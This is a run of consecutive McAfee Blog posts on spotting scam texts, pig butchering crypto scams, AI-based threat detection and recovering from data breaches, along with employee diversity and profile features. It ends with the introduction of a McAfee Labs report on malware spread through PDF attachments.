Cohen received an email he thought was from his bank’s fraud department. Later, the scammer texted Cohen claiming to be from the bank, asking for more information. Cohen ended up sending the scammer money because he believed they were a bank representative. These days, many banks and brands have FYIs on their website about how to spot a legitimate text. Like this page from Chase, which goes over what a real Chase text looks like.
We have a similar disclosure on our site. For example, our customer service teams will never request sensitive information such as social security numbers, PINs, or bank or payment details. As soon as you sign up for a new account, it’s a good idea to check for this sort of disclaimer and familiarize yourself with contact methods and the type of information organizations might request.
Scam messages are so successful because scammers make them look real. During the holidays, when shoppers are ready to leap at deals, scam messages can be hard to resist. With an increased volume of scam texts during major shopping seasons, it’s no wonder open rates can be as high as 98%.
Consumers can protect themselves against realistic-looking scam messages by verifying the source of the message. If an email hits your mobile inbox, click on the sender’s name to expand their full email address. Typical brand emails will have a “do not reply” somewhere in the address or an official “@branddomain.com” email address. Scam email addresses often appear as strings of gibberish.
If unsure whether a text from a company is real, log into your account directly to see if it reflects the overdue bill or extra store credit that the text message suggests.
Knowing about the latest cybersecurity trends is always good practice. Scammers change their tactics constantly. Text scams that were popular one year may be totally out of style the next time you get a scam message.
Individuals looking for a place to start can check out FTC, FBI, and CISA websites. Those agencies offer valuable insights about fraud trends, and recommendations about how people can protect themselves. The Better Business Bureau (BBB) has an interactive scam tracking tool, and AARP provides tips for older Americans who may not be as in tune with the latest tech trends and tools.
Thankfully, the software designed to protect against scams evolves, as well. Consumers can turn to product suites that offer features like finding and removing personal info from sites that sell it, adjusting social media controls and even providing alerts about suspicious financial transactions.
For scam texts, AI is here to help. McAfee Scam Protection uses AI to scan SMS text messages and alert you about unsafe links. Users can delete those messages without opening them, reducing the risk of compromise and removing any question about whether the message is fraudulent or real.
The $330 million figure is a stark reminder of growing fraud. As we continue into the digital age, the threat of fraudulent communications from scammers looms. To safeguard against bad actors, consumers must be proactive. By paying attention to brand communication guidelines, verifying the source of messages, remaining educated and using modern privacy and identity products, consumers can avoid scams before they start.
The post Scam or Not? How to Tell Whether Your Text Message Is Real appeared first on McAfee Blog.
“Jessica” cost him one million dollars.
In an account to Forbes, one man described how he met “Jessica” online.i Readily, they formed a friendship. Turns out, “Jessica” was a great listener, particularly as he talked about the tough times he was going through. Through chats on WhatsApp, he shared the struggles of supporting his family and rapidly ailing father.
The story telegraphs itself. Yes, “Jessica” was a scammer. Yet this scam put a new twist on an old con game. The man fell victim to a pig butchering scam — a scam that weaves together long strings of messages, cryptocurrency, and bogus investment opportunities.
Many victims lose everything.
“Jessica’s” victim broke down the scam, how it worked, and how he got roped in. It began with an introductory text in October that spun into a WhatsApp transcript spanning 271,000 words. Throughout, he shared his family and financial struggles.
Then, “Jessica” offered hope. Investments that would turn a fast buck.
“Jessica” walked him through several transactions on an app he was told to download. Small investments at first, yet increasingly larger. “Jessica” needed him to invest more and more, despite his reservations. Yet his balance grew and grew each time he followed her explicit directions.
Then, the trap sprung. Twice. In November, he logged into the app and found a negative balance close to half a million dollars. “Jessica” reassured him that he could get it back, and then some. “Jessica” encouraged him to borrow. He did. From his bank and a childhood friend.
Soon, he was back up to nearly $2 million. Or so he thought. In December, he logged into the app once again and found a negative balance of $1 million. His savings and borrowed money alike disappeared — straight into the hands of scammers. All the while, they manipulated the app with a plug-in that fabricated financial results. His whopping gains were actually massive losses.
He’s far from the only victim of pig butchering. Last year, we brought you the story of “Leslie,” a retired woman who fell victim to a different form of the same scam. A so-called friend she met online directed her to invest her retirement funds for even more returns. Soon, a lonely yet otherwise sharp retiree found herself down $100,000.
Victims like these find themselves among the thousands of people who fall for pig butchering scams each year. The problem is global in scope, costing billions of dollars each year. Yet as pig butchering represents a new type of scam, it uses some age-old tricks to separate people from their money.
With that, pig butchering scams are preventable. Awareness plays a major role, along with several other steps people can take to keep it from happening to them.
It’s a con game with a vivid name. Just as a livestock farm raises pork for profit, scammers foster long-term relationships with their victims for profit. The scammers start by taking small sums of money, which increase over time, until the victim finally gets “fattened up” and “butchered” for one final whopping sum. The term appears to have origins in the Chinese phrase zhu zai, meaning “to slaughter a pig.”
What sets pig butchering scams apart from romance scams, elder scams, and other con games is cryptocurrency. Scammers lure their victims into investing in ventures, seemingly profitable ones because the scammers appear to make the same investments themselves. With great success. Victims then mirror those investments, yet the “market” is rigged. With phony sites and apps, the scammers point to big gains — which are all mocked up on the screen. Instead, the money goes straight to them.
The scam follows a script, one that “Jessica” played out to the letter. You can see the steps.
It starts out innocently enough. A text on the phone, a note on a messaging app, or a direct message on social media comes to the victim from out of the blue. It’s from someone they don’t know, and they might ask a simple question, like …
“Is this John? We shared a tee time at the course last week and I have that extra club I said I’d give you.”
“Hi, Sally. It’s me. Sorry I can’t make lunch today. Can we reschedule?”
Or even as simple as …
“Hey.”
These “wrong number” texts and messages are anything but unintended. In some cases, victims get randomly picked. Blasts of texts and messages get sent to broad audiences, all in the hope that a handful of potential victims will reply.
Yet, by and large, victims get carefully selected. And researched. The scammers work from a dossier of info gathered on the victim, full of tidbits harvested from the victim’s online info and social media profiles. Who puts together those dossiers? Often, it’s a large, organized crime operation. The scammer behind the messages is only one part of a much larger scamming machine, which we’ll cover in a bit.
With that intel in hand, the scammers have their opening.
After an introduction, the scammer kicks off a conversation. Over time, the conversations get personal. And those personal touches have a way of luring people in. Scammers pose as another person, such as “Jessica,” sprinkle things into the conversation like similar interests or family backgrounds. Anything that’s just enough to intrigue the victim and keep them chatting.
From there, scammers play a long con game, building trust with their victims over time. Things tend to get increasingly personal. The scammer pumps the victim for more and more news of their life. What they’re worried about. What dreams they have. And in cases where the scam takes a romantic turn, how they’ll build a life together.
Then, money comes into play.
With a solid read on their victims and their lives, scammers drop hints about investment opportunities with big returns. The scammer rarely takes the money themselves. In fact, they almost always insist that the victim handles the money themselves. Instead, scammers lure their victims into using bogus apps that look like they support a legitimate trading platform. Yet they’re not. These apps act as a direct line to the scamming operation that the scammer’s working for. The money goes right into their pocket.
Meanwhile, victims see something else entirely. Scammers give them step-by-step instructions that cover what to invest, where, and how to conduct transactions with cryptocurrency. The sums start small. First $5,000 or $10,000. The victim checks in with their new investment “app” and sees a great gain. The process repeats, as the sums get proverbially fatter and fatter.
Finally, the truth comes out. Hard reality strikes when victims try to transfer their cryptocurrency out of their app. They can’t. There’s nothing there. The scammers manipulated the info on that bogus app. All the investments, all the transaction history, and all the earnings — fake.
And because the scammers did their dirty work in cryptocurrency, that money is gone. Practically untraceable and practically impossible to get back.
Clearly, “Jessica” followed this scam to the letter. However, it’s highly likely “Jessica” didn’t work alone.
Organized crime props up the vast majority of pig butchering scams.
The United States FBI points to several large-scale pig butchering operations, centered mostly in Southeast Asia.ii Other findings point to operations in Nigeria, where thousands of “Yahoo Boys” fire off romantic messages in their form of a pig butchering ring.iii
In another account, a Reuters Special Report traced $9 million to an account registered to a well-connected representative of a Chinese trade group in Thailand — which hinted at yet broader collusion and fraud.
These are big-time scams, backed by big-time operations. They run like them too.
They have dev and design teams that create legit-looking finance apps. They have even further trappings of a large, legitimate company, including support, customer service, accounting, and the like to manage transactions. Then they have their front-line operatives, the people doing the texting and messaging.
However, many of these front-line scammers do it against their will.
An even darker aspect of pig butchering scams reveals itself when you discover who does the actual dirty work. As reported by the FBI, these front-line scammers are often human trafficking victims:
Criminal actors target victims, primarily in Asia, in employment fraud schemes by posting false job advertisements on social media and online employment sites. The schemes cover a wide range of opportunities, to include tech support, call center customer service, and beauty salon technicians.
Job seekers are offered competitive salaries, lucrative benefits, paid travel expenses as well as room and board. Often throughout the process, the location for the position is shifted from the advertised location. Upon job seekers’ arrival in the foreign country, criminal actors use multiple means to coerce them to commit cryptocurrency investment schemes, such as confiscation of passports and travel documents, threat of violence, and use of violence.iv
The cruel fact of pig butchering scams is this: victims victimize victims.
Meanwhile, organized crime operations get rich. One piece of academic research traced $75.3 billion to one suspected pig butchering network alone between 2020 and 2024.v
In the U.S., the FBI points to $2.57 billion in cryptocurrency and pig butchering fraud reports in 2022.vi As always with such figures, many losses go unreported. That figure climbs much higher. Yet higher still when it accounts for victims worldwide.
Effective pig butchering requires that dossier we talked about before. A profile of the victim that includes personal details siphoned from online sources. One move that can lower your risk of becoming a target involves trimming down your presence online.
Steps include …
Make your social media more private. Our new McAfee Social Privacy Manager personalizes your privacy based on your preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in only a few clicks. This makes sure that your personal info is only visible to the people you want to share it with. It also keeps it out of search engines where the public can see it. Including scammers.
Watch what you post on public forums. As with social media, scammers harvest info from online forums dedicated to sports, hobbies, interests, and the like. If possible, use a screen name on these sites so that your profile doesn’t immediately identify you. Likewise, keep your personal details to yourself. When posted on a public forum, it becomes a matter of public record. Anyone, including scammers, can look it up.
Remove your info from data brokers that sell it. McAfee Personal Data Cleanup helps you remove your personal info from many of the riskiest data broker sites out there. Running it regularly can keep your name and info off these sites, even as data brokers collect and post new info. Depending on your plan, it can send requests to remove your data automatically.
Delete your old accounts. Yet another source of personal info comes from data breaches. Scammers use this info as well to complete a sharper picture of their potential victims. With that, many internet users can have over 350 online accounts, many of which they might not know are still active. McAfee Online Account Cleanup can help you delete them. It runs monthly scans to find your online accounts and shows you their risk level. From there, you can decide which to delete, protecting your personal info from data breaches and your overall privacy as a result.
Whether you think you’re a target or think you know someone who might be, you can take immediate steps to stop a pig butchering attack. It begins with awareness. Simply by reading this blog article, you’ve gained an understanding of what these attacks are and how they work. Not to mention how costly they can be.
If you think something sketchy is going on, take the following steps:
Ignore it.
It’s that simple. The fact that a lot of these scams start over WhatsApp and text messages means that the scammer either got your phone number online or they targeted your number randomly. In either case, they count on your response. And continued responses. In many cases, the initial contact is made by one person and viable candidates are passed on to more seasoned scammers. Bottom line: don’t interact with people you don’t know. No need to reply with “Sorry, wrong number” or anything like that. Ignore these messages and move on.
When a stranger you’ve just met online brings up money, consider it a scam.
Money talk is an immediate sign of a scam. The moment a person you’ve never met and got to know face to face asks for money, put an end to the conversation. Whether they ask for money, bank transfers, cryptocurrency, money orders, or gift cards, say no. And with pig butchering scams, never follow their directions for making a specific investment with specific tools. Doing so only funnels money into the scamming operation’s coffers.
End the conversation.
You might say no, and the scammer might back off — only to bring up the topic again later. This is a sign to end the conversation. That persistence is a sure sign of a scam. Recognize that this might be far easier said than done, as the saying goes. Scammers horn their way into the lives of their victims. A budding friendship or romance might be at stake. That’s what the scammers want you to think. They play off emotions. Hard as it is, end the relationship.
Talk with trusted friends or family members. And look out for them too.
Sometimes it takes an extra set of eyes to spot a scammer. Conversations with scammers won’t always add up. By talking about the people you meet online with someone you trust can help you see when it doesn’t. Given the way that scammers pull all kinds of strings on their victims, conversation — even to the point of showing messages to a friend — can help clear up any clouded judgment.
Alarming as pig butchering stories sound, not every new person you meet online is out to get you. For every “Jessica” out there, you’ll find far more genuine people who really do want to strike up a friendship with you. Yet as these scams increase, our guard must go up as well.
It’s always been good advice to take a relationship slowly online. Scammers have long taken advantage of people who rush to provide personal details and hand over their trust. As with any confidence scam, look for people who want to have a video call with you, meet in person in a public place, or otherwise give you the chance to see that they’re a genuine person. And not a “Jessica.”
Know those signs of a scam when you see them. And if they rear their head, act on them.
[ii] https://www.ic3.gov/Media/Y2023/PSA230522
[iii] https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4742235
[iv] https://www.ic3.gov/Media/Y2023/PSA230522
[v] https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4742235
[vi] https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf
The post What are Pig Butchering Scams and How Do They Work? appeared first on McAfee Blog.
International Women’s Day 2024’s theme, #InspireInclusion, reminds us that genuine change requires going beyond individual actions. It’s about fostering an environment where all women feel welcomed, valued, and empowered. At McAfee, we believe this starts with inspiring inclusion across every aspect of our company culture.
While we’re proud of our strides – achieving global pay parity, expanding parental leave, and ensuring diverse hiring panels – we recognize the journey continues. This International Women’s Day, we’re not just celebrating our achievements, but inspiring others to join us in building a more inclusive future.
Actively challenge biases: We’re committed to fostering a culture of open dialogue and awareness, empowering everyone to call out and challenge unconscious biases in themselves and others.
Empower diverse voices: We actively seek out diverse perspectives and experiences, ensuring everyone feels valued and heard. We celebrate the unique contributions of every team member.
McAfee Communities (also known as Employee Resource Groups (ERGs): Creating safe spaces for open dialogue, fostering a sense of belonging, and amplifying diverse perspectives
Check out members from #TeamMcAfee striking the #InspireInclusion pose:
|
|
|
|
|
|
|
|
Join McAfee and millions of others around the world in celebrating International Women’s Day by sharing how you’ll #InspireInclusion.
Interested in finding out more about what we’re doing to drive meaningful change at McAfee? Check out our Impact Report
The post How we’re #InspiringInclusion at McAfee for International Women’s Day 2024 appeared first on McAfee Blog.
There are more online users now than ever before, thanks to the availability of network-capable devices and online services. The internet population in Canada is the highest it has been, topping the charts at 33 million. That number is only expected to increase through the upcoming years. However, this growing number and continued adoption of online services pose increasing cybersecurity risks as cybercriminals take advantage of more online users and exploit vulnerabilities in online infrastructure. This is why we need AI-backed software to provide advanced protection for online users.
The nature of these online threats is ever-changing, making it difficult for legacy threat detection systems to monitor threat behavior and detect new malicious code. Fortunately, threat detection systems such as McAfee+ adapt to incorporate the latest threat intelligence and artificial intelligence (AI) driven behavioral analysis. Here’s how AI impacts cybersecurity to go beyond traditional methods to protect online users.
Most of today’s antivirus and threat detection software leverages behavioral heuristic-based detection based on machine learning models to detect known malicious behavior. Traditional methods rely on data analytics to detect known threat signatures or footprints with incredible accuracy. However, these conventional methods do not account for new malicious code, otherwise known as zero-day malware, for which there is no known information available. AI is mission-critical to cybersecurity since it enables security software and providers to take a more intelligent approach to virus and malware detection. Unlike AI–backed software, traditional methods rely solely on signature-based software and data analytics.
Similar to human-like reasoning, machine learning models follow a three-stage process to gather input, process it, and generate an output in the form of threat leads. Threat detection software can gather information from threat intelligence to understand known malware using these models. It then processes this data, stores it, and uses it to draw inferences and make decisions and predictions. Behavioral heuristic-based detection leverages multiple facets of machine learning, one of which is deep learning.
Deep learning employs neural networks to emulate the function of neurons in the human brain. This architecture uses validation algorithms for crosschecking data and complex mathematical equations, which applies an “if this, then that” approach to reasoning. It looks at what occurred in the past and analyzes current and predictive data to reach a conclusion. As the numerous layers in this framework process more data, the more accurate the prediction becomes.
Many antivirus and detection systems also use ensemble learning. This process takes a layered approach by applying multiple learning models to create one that is more robust and comprehensive. Ensemble learning can boost detection performance with fewer errors for a more accurate conclusion.
Additionally, today’s detection software leverages supervised learning techniques by taking a “learn by example” approach. This process strives to develop an algorithm by understanding the relationship between a given input and the desired output.
Machine learning is only a piece of an effective antivirus and threat detection framework. A proper framework combines new data types with machine learning and cognitive reasoning to develop a highly advanced analytical framework. This framework will allow for advanced threat detection, prevention, and remediation.
Online threats are increasing at a staggering pace. McAfee Labs observed an average of 588 malware threats per minute. These risks exist and are often exacerbated for several reasons, one of which is the complexity and connectivity of today’s world. Threat detection analysts are unable to detect new malware manually due to their high volume. However, AI can identify and categorize new malware based on malicious behavior before they get a chance to affect online users. AI–enabled software can also detect mutated malware that attempts to avoid detection by legacy antivirus systems.
Today, there are more interconnected devices and online usage ingrained into people’s everyday lives. However, the growing number of digital devices creates a broader attack surface. In other words, hackers will have a higher chance of infiltrating a device and those connected to it.
Additionally, mobile usage is putting online users at significant risk. Over 85% of the Canadian population owns a smartphone. Hackers are noticing the rising number of mobile users and are rapidly taking advantage of the fact to target users with mobile-specific malware.
The increased online connectivity through various devices also means that more information is being stored and processed online. Nowadays, more people are placing their data and privacy in the hands of corporations that have a critical responsibility to safeguard their users’ data. The fact of the matter is that not all companies can guarantee the safeguards required to uphold this promise, ultimately resulting in data and privacy breaches.
In response to these risks and the rising sophistication of the online landscape, security companies combine AI, threat intelligence, and data science to analyze and resolve new and complex cyber threats. AI-backed threat protection identifies and learns about new malware using machine learning models. This enables AI-backed antivirus software to protect online users more efficiently and reliably than ever before.
AI addresses numerous challenges posed by increasing malware complexity and volume, making it critical for online security and privacy protection. Here are the top 3 ways AI enhances cybersecurity to better protect online users.
1. Effective threat detection
The most significant difference between traditional signature-based threat detection methods and advanced AI-backed methods is the capability to detect zero-day malware. Functioning exclusively from either of these two methods will not result in an adequate level of protection. However, combining them results in a greater probability of detecting more threats with higher precision. Each method will ultimately play on the other’s strengths for a maximum level of protection.
2. Enhanced vulnerability management
AI enables threat detection software to think like a hacker. It can help software identify vulnerabilities that cybercriminals would typically exploit and flag them to the user. It also enables threat detection software to better pinpoint weaknesses in user devices before a threat has even occurred, unlike conventional methods. AI-backed security advances past traditional methods to better predict what a hacker would consider a vulnerability.
2. Better security recommendations
AI can help users understand the risks they face daily. An advanced threat detection software backed by AI can provide a more prescriptive solution to identifying risks and how to handle them. A better explanation results in a better understanding of the issue. As a result, users are more aware of how to mitigate the incident or vulnerability in the future.
AI and machine learning are only a piece of an effective threat detection framework. A proper threat detection framework combines new data types with the latest machine learning capabilities to develop a highly advanced analytical framework. This framework will allow for better threat cyber threat detection, prevention, and remediation.
The post The What, Why, and How of AI and Threat Detection appeared first on McAfee Blog.
Did you just get word that your personal information may have been caught up in a data breach? If so, you can take steps to protect yourself from harm should your info get into the hands of a scammer or thief.
How does that information get collected in the first place? We share personal information with companies for multiple reasons simply by going about our day—to pay for takeout at our favorite restaurant, to check into a hotel, or to collect rewards at the local coffee shop. Of course, we use our credit and debit cards too, sometimes as part of an online account that tracks our purchase history.
In other words, we leave trails of data practically wherever we go these days, and that data is of high value to hackers. Thus, all those breaches we read about.
Whether it’s a major breach that exposes millions of records or one of many other smaller-scale breaches like the thousands that have struck healthcare providers, each one serves as a reminder that data breaches happen regularly and that we could find ourselves affected. Depending on the breach and the kind of information you’ve shared with the business or organization in question, information stolen in a breach could include:
What do crooks do with that data? Several things. Apart from using it themselves, they may sell that data to other criminals. Either way, this can lead to illicit use of credit and debit cards, draining of bank accounts, claiming tax refunds or medical expenses in the names of the victims, or, in extreme cases, assuming the identity of others altogether.
In all, data is a kind of currency in of itself because it has the potential to unlock several aspects of victim’s life, each with its own monetary value. It’s no wonder that big breaches like these have made the news over the years, with some of the notables including:
As mentioned, these are big breaches with big companies that we likely more than recognize. Yet smaller and mid-sized businesses are targets as well, with some 43% of data breaches involving companies of that size. Likewise, restaurants and retailers have seen their Point-of-Sale (POS) terminals compromised, right on down to neighborhood restaurants.
When a company experiences a data breach, customers need to realize that this could impact their online safety. If your favorite coffee shop’s customer database gets leaked, there’s a chance that your personal or financial information was exposed. However, this doesn’t mean that your online safety is doomed. If you think you were affected by a breach, you can take several steps to protect yourself from the potential side effects.
One of the most effective ways to determine whether someone is fraudulently using one or more of your accounts is to check your statements. If you see any charges that you did not make, report them to your bank or credit card company immediately. They have processes in place to handle fraud. While you’re with them, see if they offer alerts for strange purchases, transactions, or withdrawals.
Our credit monitoring service can help you keep an eye on this. It monitors changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
Breached and stolen information often ends up in dark web marketplaces where hackers, scammers, and thieves purchase it to commit yet more crime. Once it was difficult to know if your information was caught up in such marketplaces, yet now an identity monitoring service can do the detective work for you.
Our service monitors the dark web for your personal info, including email, government IDs, credit card and bank account info, and more. This can help keep your personal info safe with early alerts that show you if your data is found on the dark web, an average of 10 months ahead of similar services. From there, you’ll get guidance that you can act on, which can help protect your info and accounts from theft.
If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity. You can place one fraud alert with any of the three major credit reporting agencies (Equifax, Experian, TransUnion) and they will notify the other two. A fraud alert typically lasts for a year, although there are options for extending it as well.
Freezing your credit will make it highly difficult for criminals to take out loans or open new accounts in your name, as a freeze halts all requests to pull your credit—even legitimate ones. In this way, it’s a far stronger measure than placing a fraud alert. Note that if you plan to take out a loan, open a new credit card, or other activity that will prompt a credit report, you’ll need to take extra steps to see that through while the freeze is in place. (The organization you’re working with can assist with the specifics.) Unlike the fraud alert, you’ll need to contact each major credit reporting agency to put one in place. Also, a freeze lasts as long as you have it in place. You’ll have to remove it yourself, again with each agency.
You can centrally manage this process with our security freeze service, which stops companies from looking at your credit profile, and thus halts the application process for loans, credit cards, utilities, new bank accounts, and more. A security freeze won’t affect your credit score.
Ensure that your passwords are strong and unique. Many people utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials, such as the one you’ll find in comprehensive online protection software.
If the unfortunate happens to you, an identity theft coverage & restoration service can help you get back on your feet. Ours offers $1 million in coverage for lawyer fees, travel expenses, and stolen funds reimbursement. It further provides support from a licensed recovery expert who can take the needed steps to repair your identity and credit. In all, it helps you recover the costs of identity theft along with the time and money it takes to recover from it.
You can take this step any time, even if you haven’t been caught up in a data breach. The fact is that data broker companies collect and sell thousands of pieces of information on millions and millions of people worldwide, part of a global economy estimated at $200 billion U.S. dollars a year. And they’ll sell it to anyone—from advertisers for their campaigns, to scammers who will use it for spammy emails, texts, and calls, and to thieves who use that information for identity theft.
Yet you can clean it up. Our personal data cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites and, with select products, even manage the removal for you.
Comprehensive online protection software will offer you the tools and services listed above, along with further features that can protect you online. That includes a VPN to keep your time online more private from online data collection while protecting it from thieves who’re out to steal credit card and account information. It also includes web browsing protection that can warn you of sketchy websites and malicious downloads that look to steal your information. In all, it’s thorough protection for your devices, privacy, and identity. And in a time of data breaches, that kind of protection has become essential.
The post How to Protect Yourself From Identity Theft After a Data Breach appeared first on McAfee Blog.
Today, we celebrate the life and legacy of Dr. Martin Luther King Jr. Dr. King diligently dedicated his life to dismantling systemic racism affecting marginalized groups and leading a peaceful movement to promote equality for all Americans, irrespective of color and creed. He leaves behind a legacy of courage, strength, perseverance, and a life-long dedication to pursuing a fair and just world.
At McAfee, we recognize the power of diverse voices and the importance of creating a space where everyone feels empowered to bring their authentic selves to the table. We believe that our collective action, fuelled by Dr. King’s unwavering spirit, can make a difference in building a more inclusive and unified world.
On this day, we commemorate MLK by honoring the man behind the message of equality. Members of the McAfee African Heritage Community share their perspectives on how Martin Luther King Jr.’s dream lives on in their actions and aspirations, shaping their commitment to fostering hope, courage, and unity.
|
Jovohn, Product Marketing Manager“I keep Martin Luther King’s dream alive by trying to embody the values of respect, empathy, and understanding in my daily life. Through genuine connections and a commitment to equality, I aim to contribute to a world where everyone is treated with dignity and fairness. Martin Luther King inspires me to be a person who values compassion and inclusivity. His teachings encourage me to approach life with a focus on empathy, fostering an environment where everyone feels heard and valued. I aspire to emulate his dedication to justice in both my personal and professional interactions. I spread hope, courage, and unity byembracing collaboration and celebrating diversity in all aspects of my life. Whether it’s through uplifting conversations, supporting others, or simply being present for those around me, I strive to contribute positively to the collective spirit. In my interactions, I hope to inspire a sense of unity that echoes Martin Luther King Jr.’s vision for a harmonious and understanding community.”
|
|
Trevia, Talent Acquisition Operations Manager“I keep Martin Luther’s King’s Dream Alive by speaking up for what I believe is right and moving against injustice, no matter what that looks like. Martin Luther King Jr. inspires me to be kind. Every day, but especially Martin Luther King Day, is a lesson in kindness and love for one another. I spread hope, courage, and unity by encouraging people to be their authentic selves, as it takes an immense amount of courage to show up as yourself, and no one else”
|
|
|
Taylor, People Experience Program ManagerI keep Martin Luther King’s dream alive by continuing to model values, principles, and empathy in my personal and professional live.
|
The post Honoring Martin Luther King Jr.’s Legacy with McAfee’s African Heritage Community appeared first on McAfee Blog.
From military beginnings to mobile security champion, meet Jovohn, our passionate Product Marketer and MAHC President. Discover how his unique path led him to advocate for customer safety and drive innovation in McAfee’s mobile business.
“Absolutely! I’m a proud graduate of Indiana University, and my journey to the Product Marketing team at McAfee has been my own personal adventure. Growing up as a military kid, I thrived on change, adapting to new environments every few years. From Alaskan frostbite to New Mexico sand dunes, those experiences shaped my adaptability and perspective. I loved team sports and dabbled in music, even engineering for a Sony artist before my 15+ year marketing career!
Recently, I transitioned from McAfee’s Retention Marketing team to my new role in Product Marketing, where I’m navigating the dynamic world of McAfee’s mobile business. Developing strategic marketing initiatives is not just a job for me; it’s a creative adventure, and I’m excited to bring that energy to the team!
But my role goes beyond crafting campaigns. I play a part in ensuring our customers receive top-notch mobile security solutions, directly contributing to McAfee’s mission of protecting our connected world. Every day, I’m involved in understanding the competitive landscape, gathering feedback from our customers, and using those insights to help shape products that truly address their needs. It’s more than marketing; it’s advocating for our customers and giving them the tools to stay safe online, which is core to our work at McAfee.”
“Believe it or not, it all started with Eddie Murphy’s “Boomerang!” This captivating movie offered a glimpse into the advertising world, igniting my passion for marketing. It started in high school with direct marketing, where I was the youngest voice in a call center where we provided direct marketing sales for telecom comapnies. After college, I built a foundation in market research, fascinated by the power of data and its impact on marketing decisions. This fueled my drive to become a well-rounded, data-driven marketer.”
“After six years at McAfee, I cherish the collaborative and innovative atmosphere. Working with talented colleagues who become friends makes it even better. Our dynamic environment, fueled by teamwork, respect, and a constant pursuit of excellence, drives collective success. Plus, contributing to McAfee’s mobile business growth is incredibly rewarding! Seeing the impact our work has on safeguarding millions of people worldwide fuels a deep sense of purpose and accomplishment. I’m excited to collaborate with my team, developing and executing strategies that drive meaningful results while enhancing the security and digital well-being of our mobile experiences. It’s an opportunity to not only push the boundaries of innovation but also make a tangible difference in the lives of millions.”
“Leading MAHC (McAfee African Heritage Community) is an honor, aligning with my passion for fostering diverse communities. I’ve been involved for five years, taking a more active leadership role in 2022 to truly make a difference.
MAHC is more than just a professional hub; it’s a space for engaging conversations that go beyond work, fostering a culture of respect and understanding that McAfee values. We host talks with individuals from all walks of life, making it a cathartic platform not just for professional growth but also for personal connection and understanding. It’s a unique blend of networking and genuine camaraderie.”
“My greatest joy comes from being a husband and dad. Our family is always on the go, from after-school activities to sports! Weekends are all about fellowship, connecting with grandparents, and staying grounded in what truly matters. Personally, I love finding a good show to binge, gaming, and soaking up the outdoors in open spaces. It’s all about balance and bringing a fresh perspective to both my personal and professional life.”
“Despite my non-traditional product marketing background, I bring a diverse skill set from market research and advertising. For those considering a product marketing career, I would embrace a multidisciplinary approach. This allows for a well-rounded understanding of consumer behavior, market dynamics, and effective communication strategies. Success for today’s marketers often lies in the ability to draw insights from various experiences and apply them creatively in today’s dynamic market landscape.”
If you’re interested in the work Jovohn does or want to learn more about our career opportunities at McAfee, please visit our jobs page or join our talent network to receive updates on career opportunities from McAfee.
The post From Military Kid to Product Marketing: My McAfee Journey appeared first on McAfee Blog.
This International Day of Women and Girls in Science, #TeamMcAfee is proud to join forces with the incredible McAfee Women in Security Community (WISE) to celebrate the achievements of women in Science, Technology, Engineering, and Mathematics (STEM)!
WISE is a passionate group of women (and men!) who are dedicated to creating a more inclusive and welcoming environment for all at McAfee, actively supporting and empowering the next generation of female STEM leaders.
“At WISE, we believe in nurturing a diverse and thriving community where every individual, regardless of gender, can unleash their potential. This International Day of Women and Girls in Science, we’re proud to celebrate the journeys of Arati, Sai, Defne, Richa, and Sowmya. Their stories are testaments to the transformative power of STEM, and their voices inspire young women to dream big and pursue their passion for science and technology.”Brenda, President of WISE
Arati, Sai, Defne, Richa, and Sowmya illustrate the transformative power of STEM, the impact of McAfee and the WISE community on their journeys, and their insightful advice for young women embarking on their own STEM journeys.
|
Arati, Sr. Director, Engineering
“During my school days, I was a curious student who did well in Science and Maths. My classmates often sought my help understanding challenging concepts, which fueled my confidence and solidified my love for these fields. I thrived in stimulating environments where I could push boundaries and explore my full potential, and STEM offered exactly that. It was the perfect path to avoid succumbing to the boredom of routine and truly discover what I could achieve.
|
|
Sai: Sr. Technology & Innovation Researcher
“Right from my early school days I liked the evidence based scientific reasoning method – using experiments and observations to draw conclusions on a phenomenon. Naturally, pursuing a career in STEM was a path I couldn’t wait to explore. Today, as a Sr. Technology & Innovation Researcher at McAfee, I continue to delve into the unknown, but with the added benefit of having a supportive community and team around me.
|
|
Defne: Director of Technology Services
“My path to STEM started with a simple spark: a love for solving problems. Growing up in a supportive environment, fueled by encouragement from parents and teachers, I was never afraid to ask questions and delve into the unknown. Fast forward to today, and I’m the Director of Technology Services at McAfee, leading a team that supports People Success and Legal systems.
|
|
Richa: Technical Program Manager
“Driven by a thirst for knowledge and a deep desire to contribute to the world, I embarked on my STEM journey fueled by my passion for science. Today, as a Technical Program Manager with over 10 years at McAfee, I’m proud to be part of a company that fosters innovation and empowers individuals to make a difference.
|
|
Sowmya: Data Governance Manager
“Growing up surrounded by academia, with a mother who rose to lead a women’s college, instilled in me a deep yearning for both career advancement and leadership. But it was the allure of logical problem-solving and the thrill of technology’s evolution, like witnessing the first Indian cell phone, that truly drew me to STEM. I embarked on a journey to unravel the intricacies of cellular and satellite communication systems with a bachelor’s in electronics and communications engineering, eager to play my part in shaping the future and being at the forefront of innovation and emerging technologies.
|
The post Celebrating International Day of Women and Girls in Science appeared first on McAfee Blog.
Authored by Yashvi Shah and Preksha Saxena
McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not solely sourced from dubious websites or downloads; certain instances of malware may reside within apparently harmless emails, particularly within the PDF file attachments accompanying them. The subsequent trend observed in the past three months through McAfee telemetry pertains to the prevalence of malware distributed through non-portable executable (non-PE) vectors.
Figure 1: Rise in PDF malware
Upon implementing Microsoft‘s macro-blocking measures for Internet-delivered Office files, threat actors were compelled to devise alternative methods for email malware distribution. The complex structure of PDF files renders them susceptible to exploitation, posing significant challenges in detecting malicious content within. As a commonly employed file format distributed via email attachments in the consumer domain, PDFs represent an enticing avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based malware, often containing payloads hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.
